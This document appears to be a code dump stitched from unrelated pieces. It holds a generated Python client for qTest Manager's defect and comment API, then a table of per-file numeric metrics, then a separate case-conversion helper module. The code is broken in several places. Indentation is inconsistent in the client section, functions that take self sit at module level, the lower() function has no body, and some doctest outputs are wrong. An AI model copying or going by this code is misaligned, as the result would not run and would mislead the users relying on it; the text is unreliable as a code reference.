:param int project_id: ID of the project (required)
:param str id_or_key: PID or ID of the Defect whose Comment you want to delete (required)
:param int comment_id: ID of the comment. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_comment_with_http_info(project_id, id_or_key, comment_id, **kwargs)
else:
(data) = self.delete_comment_with_http_info(project_id, id_or_key, comment_id, **kwargs)
return data
    def delete_comment_with_http_info(self, project_id, id_or_key, comment_id, **kwargs):
        """
        Deletes a Comment of a Defect
        To delete a specific Comment of a Defect <strong>qTest Manager version:</strong> 7.5+
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_comment_with_http_info(project_id, id_or_key, comment_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param int project_id: ID of the project (required)
        :param str id_or_key: PID or ID of the Defect whose Comment you want to delete (required)
        :param int comment_id: ID of the comment. (required)
        :return: object
            If the method is called asynchronously,
            returns the request thread.
        :raises TypeError: on an unexpected keyword argument
        :raises ValueError: when a required parameter is missing or None
        """
        # Keywords accepted in addition to the positional parameters.
        all_params = ['project_id', 'id_or_key', 'comment_id']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # NOTE: locals() is snapshotted here deliberately, so `params` holds
        # exactly the names bound so far (self, the positional args, kwargs,
        # all_params); extra kwargs are then folded in after validation.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_comment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'project_id' is set
        if ('project_id' not in params) or (params['project_id'] is None):
            raise ValueError("Missing the required parameter `project_id` when calling `delete_comment`")
        # verify the required parameter 'id_or_key' is set
        if ('id_or_key' not in params) or (params['id_or_key'] is None):
            raise ValueError("Missing the required parameter `id_or_key` when calling `delete_comment`")
        # verify the required parameter 'comment_id' is set
        if ('comment_id' not in params) or (params['comment_id'] is None):
            raise ValueError("Missing the required parameter `comment_id` when calling `delete_comment`")

        collection_formats = {}

        # Endpoint template; path placeholders are substituted by the client.
        resource_path = '/api/v3/projects/{projectId}/defects/{idOrKey}/comments/{commentId}'.replace('{format}', 'json')
        path_params = {}
        if 'project_id' in params:
            path_params['projectId'] = params['project_id']
        if 'id_or_key' in params:
            path_params['idOrKey'] = params['id_or_key']
        if 'comment_id' in params:
            path_params['commentId'] = params['comment_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        # DELETE carries no request body.
        body_params = None

        # Authentication setting
        auth_settings = ['Authorization']

        return self.api_client.call_api(resource_path, 'DELETE',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='object',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
def get_comment(self, project_id, id_or_key, comment_id, **kwargs):
    """Gets a Comment of a Defect.

    To retrieve a specific Comment of a Defect
    <strong>qTest Manager version:</strong> 7.5+

    The request is synchronous by default. Supplying a `callback`
    keyword argument makes it asynchronous; the callback is invoked
    with the response and the request thread is returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int project_id: ID of the project (required)
    :param str id_or_key: PID or ID of the Defect whose comment you want to retrieve (required)
    :param int comment_id: ID of the comment (required)
    :return: CommentResource
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the transport layer for just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both forward to the *_with_http_info variant;
    # with a callback it yields the request thread rather than the data.
    return self.get_comment_with_http_info(
        project_id, id_or_key, comment_id, **kwargs)
def get_comment_with_http_info(self, project_id, id_or_key, comment_id, **kwargs):
    """Gets a Comment of a Defect.

    To retrieve a specific Comment of a Defect
    <strong>qTest Manager version:</strong> 7.5+

    The request is synchronous by default. Supplying a `callback`
    keyword argument makes it asynchronous; the callback is invoked
    with the response and the request thread is returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int project_id: ID of the project (required)
    :param str id_or_key: PID or ID of the Defect whose comment you want to retrieve (required)
    :param int comment_id: ID of the comment (required)
    :return: CommentResource
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments the caller may legally supply.
    accepted = {'project_id', 'id_or_key', 'comment_id', 'callback',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    params = {'project_id': project_id,
              'id_or_key': id_or_key,
              'comment_id': comment_id}
    for key, val in iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_comment" % key
            )
        params[key] = val
    # Every path parameter is mandatory and must not be None.
    for name in ('project_id', 'id_or_key', 'comment_id'):
        if params.get(name) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling `get_comment`" % name)
    resource_path = '/api/v3/projects/{projectId}/defects/{idOrKey}/comments/{commentId}'.replace('{format}', 'json')
    # Map python_case parameter names onto the path template's wire names.
    path_params = {}
    for py_name, wire_name in (('project_id', 'projectId'),
                               ('id_or_key', 'idOrKey'),
                               ('comment_id', 'commentId')):
        if py_name in params:
            path_params[wire_name] = params[py_name]
    # Endpoint uses the 'Authorization' auth setting and carries no
    # query string, extra headers, form fields or request body.
    return self.api_client.call_api(
        resource_path, 'GET',
        path_params,
        {},
        {},
        body=None,
        post_params=[],
        files={},
        response_type='CommentResource',
        auth_settings=['Authorization'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_comments(self, project_id, id_or_key, **kwargs):
    """Gets all Comments of a Defect.

    To retrieve all Comments of a Defect
    <strong>qTest Manager version:</strong> 7.5+

    The request is synchronous by default. Supplying a `callback`
    keyword argument makes it asynchronous; the callback is invoked
    with the response and the request thread is returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int project_id: ID of the project (required)
    :param str id_or_key: PID or ID of the Defect whose comments you want to retrieve (required)
    :param int page: By default the first page is returned but you can specify any page number to retrieve objects
    :param int page_size: The result is paginated. By the default, the number of objects in each page is 100 if this is omitted. You can specify your custom number (up to 999) in this parameter
    :return: PagedResourceCommentResource
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the transport layer for just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both forward to the *_with_http_info variant;
    # with a callback it yields the request thread rather than the data.
    return self.get_comments_with_http_info(project_id, id_or_key, **kwargs)
def get_comments_with_http_info(self, project_id, id_or_key, **kwargs):
    """Gets all Comments of a Defect.

    To retrieve all Comments of a Defect
    <strong>qTest Manager version:</strong> 7.5+

    The request is synchronous by default. Supplying a `callback`
    keyword argument makes it asynchronous; the callback is invoked
    with the response and the request thread is returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int project_id: ID of the project (required)
    :param str id_or_key: PID or ID of the Defect whose comments you want to retrieve (required)
    :param int page: By default the first page is returned but you can specify any page number to retrieve objects
    :param int page_size: The result is paginated. By the default, the number of objects in each page is 100 if this is omitted. You can specify your custom number (up to 999) in this parameter
    :return: PagedResourceCommentResource
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments the caller may legally supply.
    accepted = {'project_id', 'id_or_key', 'page', 'page_size', 'callback',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    params = {'project_id': project_id, 'id_or_key': id_or_key}
    for key, val in iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_comments" % key
            )
        params[key] = val
    # Both path parameters are mandatory and must not be None.
    for name in ('project_id', 'id_or_key'):
        if params.get(name) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling `get_comments`" % name)
    resource_path = '/api/v3/projects/{projectId}/defects/{idOrKey}/comments'.replace('{format}', 'json')
    # Map python_case parameter names onto the path template's wire names.
    path_params = {}
    for py_name, wire_name in (('project_id', 'projectId'),
                               ('id_or_key', 'idOrKey')):
        if py_name in params:
            path_params[wire_name] = params[py_name]
    # Pagination controls are optional and travel in the query string.
    query_params = {}
    for py_name, wire_name in (('page', 'page'), ('page_size', 'pageSize')):
        if py_name in params:
            query_params[wire_name] = params[py_name]
    # Endpoint uses the 'Authorization' auth setting; no body or form data.
    return self.api_client.call_api(
        resource_path, 'GET',
        path_params,
        query_params,
        {},
        body=None,
        post_params=[],
        files={},
        response_type='PagedResourceCommentResource',
        auth_settings=['Authorization'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_defect(self, project_id, defect_id, **kwargs):
    """Gets a Defect.

    To retrieve a Defect
    <strong>qTest Manager version:</strong> 6+

    The request is synchronous by default. Supplying a `callback`
    keyword argument makes it asynchronous; the callback is invoked
    with the response and the request thread is returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int project_id: ID of the project (required)
    :param str defect_id: ID of the defect. (required)
    :return: DefectResource
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the transport layer for just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both forward to the *_with_http_info variant;
    # with a callback it yields the request thread rather than the data.
    return self.get_defect_with_http_info(project_id, defect_id, **kwargs)
def get_defect_with_http_info(self, project_id, defect_id, **kwargs):
    """Gets a Defect.

    To retrieve a Defect
    <strong>qTest Manager version:</strong> 6+

    The request is synchronous by default. Supplying a `callback`
    keyword argument makes it asynchronous; the callback is invoked
    with the response and the request thread is returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int project_id: ID of the project (required)
    :param str defect_id: ID of the defect. (required)
    :return: DefectResource
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments the caller may legally supply.
    accepted = {'project_id', 'defect_id', 'callback',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    params = {'project_id': project_id, 'defect_id': defect_id}
    for key, val in iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_defect" % key
            )
        params[key] = val
    # Both path parameters are mandatory and must not be None.
    for name in ('project_id', 'defect_id'):
        if params.get(name) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling `get_defect`" % name)
    resource_path = '/api/v3/projects/{projectId}/defects/{defectId}'.replace('{format}', 'json')
    # Map python_case parameter names onto the path template's wire names.
    path_params = {}
    for py_name, wire_name in (('project_id', 'projectId'),
                               ('defect_id', 'defectId')):
        if py_name in params:
            path_params[wire_name] = params[py_name]
    # Endpoint uses the 'Authorization' auth setting and carries no
    # query string, extra headers, form fields or request body.
    return self.api_client.call_api(
        resource_path, 'GET',
        path_params,
        {},
        {},
        body=None,
        post_params=[],
        files={},
        response_type='DefectResource',
        auth_settings=['Authorization'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_last_changed(self, project_id, start_time, **kwargs):
    """Gets recently updated Defects.

    To retrieve Defects which have been recently updated after a
    specified time.

    The request is synchronous by default. Supplying a `callback`
    keyword argument makes it asynchronous; the callback is invoked
    with the response and the request thread is returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int project_id: ID of the project (required)
    :param str start_time: The specified time since when the Defects have been updated. It needs to be URL encoded: <em>yyyy-MM-dd'T'HH:mm:ss.SSSZ</em> or <em>yyyy-MM-dd'T'HH:mm:ssZZ</em> (required)
    :param str end_time: Do not support at this time. Use the current time only.
    :param int size: The result is paginated. By the default, the number of objects in each page is 100. You can specify your custom number in this parameter. The maximum page size is 999.
    :param int page: By default the first page is returned but you can specify any page number to retrieve objects
    :return: list[DefectResource]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the transport layer for just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both forward to the *_with_http_info variant;
    # with a callback it yields the request thread rather than the data.
    return self.get_last_changed_with_http_info(project_id, start_time, **kwargs)
def get_last_changed_with_http_info(self, project_id, start_time, **kwargs):
    """Gets recently updated Defects.

    To retrieve Defects which have been recently updated after a
    specified time.

    The request is synchronous by default. Supplying a `callback`
    keyword argument makes it asynchronous; the callback is invoked
    with the response and the request thread is returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int project_id: ID of the project (required)
    :param str start_time: The specified time since when the Defects have been updated. It needs to be URL encoded: <em>yyyy-MM-dd'T'HH:mm:ss.SSSZ</em> or <em>yyyy-MM-dd'T'HH:mm:ssZZ</em> (required)
    :param str end_time: Do not support at this time. Use the current time only.
    :param int size: The result is paginated. By the default, the number of objects in each page is 100. You can specify your custom number in this parameter. The maximum page size is 999.
    :param int page: By default the first page is returned but you can specify any page number to retrieve objects
    :return: list[DefectResource]
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments the caller may legally supply.
    accepted = {'project_id', 'start_time', 'end_time', 'size', 'page',
                'callback', '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    params = {'project_id': project_id, 'start_time': start_time}
    for key, val in iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_last_changed" % key
            )
        params[key] = val
    # Project and start time are mandatory and must not be None.
    for name in ('project_id', 'start_time'):
        if params.get(name) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling `get_last_changed`" % name)
    resource_path = '/api/v3/projects/{projectId}/defects/last-change'.replace('{format}', 'json')
    path_params = {}
    if 'project_id' in params:
        path_params['projectId'] = params['project_id']
    # Time window and pagination controls travel in the query string.
    query_params = {}
    for py_name, wire_name in (('start_time', 'startTime'),
                               ('end_time', 'endTime'),
                               ('size', 'size'),
                               ('page', 'page')):
        if py_name in params:
            query_params[wire_name] = params[py_name]
    # Endpoint uses the 'Authorization' auth setting; no body or form data.
    return self.api_client.call_api(
        resource_path, 'GET',
        path_params,
        query_params,
        {},
        body=None,
        post_params=[],
        files={},
        response_type='list[DefectResource]',
        auth_settings=['Authorization'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def submit_defect(self, project_id, body, **kwargs):
    """Submit a Defect.

    To submit an internal Defect.

    The request is synchronous by default. Supplying a `callback`
    keyword argument makes it asynchronous; the callback is invoked
    with the response and the request thread is returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int project_id: ID of the project (required)
    :param DefectResource body: <em>properties:</em> a JSONArray of field-value pairs <em>attachments:</em> a JSONArray of Attachment objects (required)
    :return: DefectResource
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the transport layer for just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both forward to the *_with_http_info variant;
    # with a callback it yields the request thread rather than the data.
    return self.submit_defect_with_http_info(project_id, body, **kwargs)
def submit_defect_with_http_info(self, project_id, body, **kwargs):
    """Submit a Defect.

    To submit an internal Defect.

    The request is synchronous by default. Supplying a `callback`
    keyword argument makes it asynchronous; the callback is invoked
    with the response and the request thread is returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int project_id: ID of the project (required)
    :param DefectResource body: <em>properties:</em> a JSONArray of field-value pairs <em>attachments:</em> a JSONArray of Attachment objects (required)
    :return: DefectResource
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments the caller may legally supply.
    accepted = {'project_id', 'body', 'callback',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    params = {'project_id': project_id, 'body': body}
    for key, val in iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method submit_defect" % key
            )
        params[key] = val
    # Project and request body are mandatory and must not be None.
    for name in ('project_id', 'body'):
        if params.get(name) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling `submit_defect`" % name)
    resource_path = '/api/v3/projects/{projectId}/defects'.replace('{format}', 'json')
    path_params = {}
    if 'project_id' in params:
        path_params['projectId'] = params['project_id']
    # POST the DefectResource payload; 'Authorization' auth setting,
    # no query string, extra headers or form data.
    return self.api_client.call_api(
        resource_path, 'POST',
        path_params,
        {},
        {},
        body=params['body'],
        post_params=[],
        files={},
        response_type='DefectResource',
        auth_settings=['Authorization'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_comment(self, project_id, id_or_key, comment_id, body, **kwargs):
    """Updates a Comment of a Defect.

    To update a specific Comment of a Defect
    <strong>qTest Manager version:</strong> 7.5+

    The request is synchronous by default. Supplying a `callback`
    keyword argument makes it asynchronous; the callback is invoked
    with the response and the request thread is returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int project_id: ID of the project (required)
    :param str id_or_key: PID or ID of the defect whose comment you want to update (required)
    :param int comment_id: ID of the comment (required)
    :param CommentResource body: Given resource to update a comment. (required)
    :return: CommentResource
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the transport layer for just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both forward to the *_with_http_info variant;
    # with a callback it yields the request thread rather than the data.
    return self.update_comment_with_http_info(
        project_id, id_or_key, comment_id, body, **kwargs)
def update_comment_with_http_info(self, project_id, id_or_key, comment_id, body, **kwargs):
    """Updates a Comment of a Defect.

    To update a specific Comment of a Defect
    <strong>qTest Manager version:</strong> 7.5+

    The request is synchronous by default. Supplying a `callback`
    keyword argument makes it asynchronous; the callback is invoked
    with the response and the request thread is returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int project_id: ID of the project (required)
    :param str id_or_key: PID or ID of the defect whose comment you want to update (required)
    :param int comment_id: ID of the comment (required)
    :param CommentResource body: Given resource to update a comment. (required)
    :return: CommentResource
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments the caller may legally supply.
    accepted = {'project_id', 'id_or_key', 'comment_id', 'body',
                'callback', '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    params = {'project_id': project_id,
              'id_or_key': id_or_key,
              'comment_id': comment_id,
              'body': body}
    for key, val in iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_comment" % key
            )
        params[key] = val
    # All path parameters plus the request body are mandatory.
    for name in ('project_id', 'id_or_key', 'comment_id', 'body'):
        if params.get(name) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling `update_comment`" % name)
    resource_path = '/api/v3/projects/{projectId}/defects/{idOrKey}/comments/{commentId}'.replace('{format}', 'json')
    # Map python_case parameter names onto the path template's wire names.
    path_params = {}
    for py_name, wire_name in (('project_id', 'projectId'),
                               ('id_or_key', 'idOrKey'),
                               ('comment_id', 'commentId')):
        if py_name in params:
            path_params[wire_name] = params[py_name]
    # PUT the CommentResource payload; 'Authorization' auth setting,
    # no query string, extra headers or form data.
    return self.api_client.call_api(
        resource_path, 'PUT',
        path_params,
        {},
        {},
        body=params['body'],
        post_params=[],
        files={},
        response_type='CommentResource',
        auth_settings=['Authorization'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def update_defect(self, project_id, defect_id, body, **kwargs):
    """Updates a Defect.

    To update a Defect
    <strong>qTest Manager version:</strong> 6+

    The request is synchronous by default. Supplying a `callback`
    keyword argument makes it asynchronous; the callback is invoked
    with the response and the request thread is returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int project_id: ID of the project (required)
    :param int defect_id: ID of the Defect which needs to be updated. (required)
    :param DefectResource body: The Defect's updated properties (required)
    :return: DefectResource
        If the method is called asynchronously,
        returns the request thread.
    """
    # Ask the transport layer for just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    # Sync and async paths both forward to the *_with_http_info variant;
    # with a callback it yields the request thread rather than the data.
    return self.update_defect_with_http_info(
        project_id, defect_id, body, **kwargs)
def update_defect_with_http_info(self, project_id, defect_id, body, **kwargs):
    """Updates a Defect.

    To update a Defect
    <strong>qTest Manager version:</strong> 6+

    The request is synchronous by default. Supplying a `callback`
    keyword argument makes it asynchronous; the callback is invoked
    with the response and the request thread is returned instead.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int project_id: ID of the project (required)
    :param int defect_id: ID of the Defect which needs to be updated. (required)
    :param DefectResource body: The Defect's updated properties (required)
    :return: DefectResource
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments the caller may legally supply.
    accepted = {'project_id', 'defect_id', 'body', 'callback',
                '_return_http_data_only', '_preload_content',
                '_request_timeout'}
    params = {'project_id': project_id,
              'defect_id': defect_id,
              'body': body}
    for key, val in iteritems(kwargs):
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_defect" % key
            )
        params[key] = val
    # Both path parameters plus the request body are mandatory.
    for name in ('project_id', 'defect_id', 'body'):
        if params.get(name) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling `update_defect`" % name)
    resource_path = '/api/v3/projects/{projectId}/defects/{defectId}'.replace('{format}', 'json')
    # Map python_case parameter names onto the path template's wire names.
    path_params = {}
    for py_name, wire_name in (('project_id', 'projectId'),
                               ('defect_id', 'defectId')):
        if py_name in params:
            path_params[wire_name] = params[py_name]
    # PUT the DefectResource payload; 'Authorization' auth setting,
    # no query string, extra headers or form data.
    return self.api_client.call_api(
        resource_path, 'PUT',
        path_params,
        {},
        {},
        body=params['body'],
        post_params=[],
        files={},
        response_type='DefectResource',
        auth_settings=['Authorization'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
| 48.281664
| 203
| 0.577268
| 5,643
| 51,082
| 5.01081
| 0.043417
| 0.042969
| 0.018567
| 0.022917
| 0.973334
| 0.961133
| 0.958092
| 0.95261
| 0.9478
| 0.940197
| 0
| 0.002145
| 0.343017
| 51,082
| 1,057
| 204
| 48.327342
| 0.840405
| 0.351885
| 0
| 0.781784
| 1
| 0
| 0.204073
| 0.038028
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036053
| false
| 0
| 0.013283
| 0
| 0.102467
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
79662dfebfc4d3b45fa5c9225f73eb241645f17c
| 8,781
|
py
|
Python
|
case_conversion/converter.py
|
AlejandroFrias/case-conversion
|
a62128c14691e87865435ae56c15119f38de65c5
|
[
"MIT"
] | 18
|
2016-05-03T19:33:05.000Z
|
2022-03-25T14:37:14.000Z
|
case_conversion/converter.py
|
AlejandroFrias/case-conversion
|
a62128c14691e87865435ae56c15119f38de65c5
|
[
"MIT"
] | 21
|
2016-12-13T10:30:52.000Z
|
2021-05-13T15:32:35.000Z
|
case_conversion/converter.py
|
AlejandroFrias/case-conversion
|
a62128c14691e87865435ae56c15119f38de65c5
|
[
"MIT"
] | 7
|
2016-07-24T13:14:51.000Z
|
2022-02-06T12:39:36.000Z
|
from typing import List, Optional
from .parser import parse_case
def camel(text: str, acronyms: Optional[List[str]] = None) -> str:
    """Convert *text* to camelCase style.

    Args:
        text (str): Input string to be converted
        acronyms (optional, list of str): List of acronyms to honor

    Returns:
        str: Case converted text

    Examples:
        >>> camel("hello world")
        'helloWorld'
        >>> camel("HELLO_HTML_WORLD", ["HTML"])
        'helloHTMLWorld'
    """
    words, *_rest = parse_case(text, acronyms)
    # Only the leading word is forced to lower case; the remaining
    # words keep the capitalisation chosen by the parser.
    head = [words[0].lower()] if words else []
    return "".join(head + words[1:])
def pascal(text: str, acronyms: Optional[List[str]] = None) -> str:
    """Convert *text* to PascalCase style.

    This case style is also known as: MixedCase

    Args:
        text (str): Input string to be converted
        acronyms (optional, list of str): List of acronyms to honor

    Returns:
        str: Case converted text

    Examples:
        >>> pascal("hello world")
        'HelloWorld'
        >>> pascal("HELLO_HTML_WORLD", ["HTML"])
        'HelloHTMLWorld'
    """
    # The parser already capitalises each word, so joining is enough.
    words, *_rest = parse_case(text, acronyms)
    return "".join(words)
def snake(text: str, acronyms: Optional[List[str]] = None) -> str:
    """Convert *text* to snake_case style.

    Args:
        text (str): Input string to be converted
        acronyms (optional, list of str): List of acronyms to honor

    Returns:
        str: Case converted text

    Examples:
        >>> snake("hello world")
        'hello_world'
        >>> snake("HelloHTMLWorld", ["HTML"])
        'hello_html_world'
    """
    words, *_rest = parse_case(text, acronyms)
    # Lower-case every word and glue them with underscores.
    return "_".join(word.lower() for word in words)
def dash(text: str, acronyms: Optional[List[str]] = None) -> str:
    """Convert *text* to dash-case style.

    This case style is also known as: kebab-case, spinal-case, slug-case

    Args:
        text (str): Input string to be converted
        acronyms (optional, list of str): List of acronyms to honor

    Returns:
        str: Case converted text

    Examples:
        >>> dash("hello world")
        'hello-world'
        >>> dash("HelloHTMLWorld", ["HTML"])
        'hello-html-world'
    """
    words, *_rest = parse_case(text, acronyms)
    # Lower-case every word and glue them with hyphens.
    return "-".join(word.lower() for word in words)
def const(text: str, acronyms: Optional[List[str]] = None) -> str:
    """Convert *text* to CONST_CASE.

    Also known as: SCREAMING_SNAKE_CASE.

    Args:
        text (str): Input string to be converted
        acronyms (optional, list of str): List of acronyms to honor

    Returns:
        str: Case converted text

    Examples:
        >>> const("hello world")
        'HELLO_WORLD'
        >>> const("helloHTMLWorld", ["HTML"])
        'HELLO_HTML_WORLD'
    """
    parsed, *_ = parse_case(text, acronyms)
    # Uppercase every parsed word, then join with underscores.
    return "_".join(map(str.upper, parsed))
def dot(text: str, acronyms: Optional[List[str]] = None) -> str:
    """Convert *text* to dot.case.

    Args:
        text (str): Input string to be converted
        acronyms (optional, list of str): List of acronyms to honor

    Returns:
        str: Case converted text

    Examples:
        >>> dot("hello world")
        'hello.world'
        >>> dot("helloHTMLWorld", ["HTML"])
        'hello.html.world'
    """
    parsed, *_ = parse_case(text, acronyms)
    lowered = (word.lower() for word in parsed)
    return ".".join(lowered)
def separate_words(text: str, acronyms: Optional[List[str]] = None) -> str:
    """Return text in "separate words" style.

    Args:
        text (str): Input string to be converted
        acronyms (optional, list of str): List of acronyms to honor

    Returns:
        str: Case converted text

    Examples:
        >>> separate_words("HELLO_WORLD")
        'HELLO WORLD'
        >>> separate_words("helloHTMLWorld", ["HTML"])
        'hello HTML World'
    """
    # Fixed docstring typo ("seperate" -> "separate"); logic unchanged.
    # preserve_case=True keeps each word's original casing.
    words, *_ = parse_case(text, acronyms, preserve_case=True)
    return " ".join(words)
def slash(text: str, acronyms: Optional[List[str]] = None) -> str:
    """Convert *text* to slash/case.

    Args:
        text (str): Input string to be converted
        acronyms (optional, list of str): List of acronyms to honor

    Returns:
        str: Case converted text

    Examples:
        >>> slash("HELLO_WORLD")
        'HELLO/WORLD'
        >>> slash("helloHTMLWorld", ["HTML"])
        'hello/HTML/World'
    """
    # Word casing is preserved; only the separators change.
    parsed, *_ = parse_case(text, acronyms, preserve_case=True)
    return "/".join(parsed)
def backslash(text: str, acronyms: Optional[List[str]] = None) -> str:
r"""Return text in backslash\case style.
Args:
text (str): Input string to be converted
acronyms (optional, list of str): List of acronyms to honor
Returns:
str: Case converted text
Examples:
>>> backslash("HELLO_WORLD")
r'HELLO\WORLD'
>>> backslash("helloHTMLWorld", ["HTML"])
r'hello\HTML\World'
"""
words, *_ = parse_case(text, acronyms, preserve_case=True)
return "\\".join(words)
def ada(text: str, acronyms: Optional[List[str]] = None) -> str:
    """Return text in Ada_Case style.

    This case style is also known as: Camel_Snake

    Args:
        text (str): Input string to be converted
        acronyms (optional, list of str): List of acronyms to honor

    Returns:
        str: Case converted text

    Examples:
        >>> ada("hello_world")
        'Hello_World'
        >>> ada("helloHTMLWorld", ["HTML"])
        'Hello_HTML_World'
    """
    # Fixed doctest outputs: expected strings must be quoted (repr form)
    # or doctest fails. Logic unchanged.
    words, *_ = parse_case(text, acronyms)
    return "_".join(w.capitalize() for w in words)
def http_header(text: str, acronyms: Optional[List[str]] = None) -> str:
    """Return text in Http-Header-Case style.

    Args:
        text (str): Input string to be converted
        acronyms (optional, list of str): List of acronyms to honor

    Returns:
        str: Case converted text

    Examples:
        >>> http_header("hello_world")
        'Hello-World'
        >>> http_header("helloHTMLWorld", ["HTML"])
        'Hello-HTML-World'
    """
    # Fixed doctest outputs: expected strings must be quoted (repr form)
    # or doctest fails. Logic unchanged.
    words, *_ = parse_case(text, acronyms)
    return "-".join(w.capitalize() for w in words)
def lower(text: str, *args, **kwargs) -> str:
    """Return text in lowercase style.

    This is a convenience function wrapping inbuilt lower().
    It features the same signature as other conversion functions.
    Note: Acronyms are not being honored.

    Args:
        text (str): Input string to be converted
        args : Placeholder to conform to common signature
        kwargs : Placeholder to conform to common signature

    Returns:
        str: Case converted text

    Examples:
        >>> lower("HELLO_WORLD")
        'hello_world'
        >>> lower("helloHTMLWorld", ["HTML"])
        'hellohtmlworld'
    """
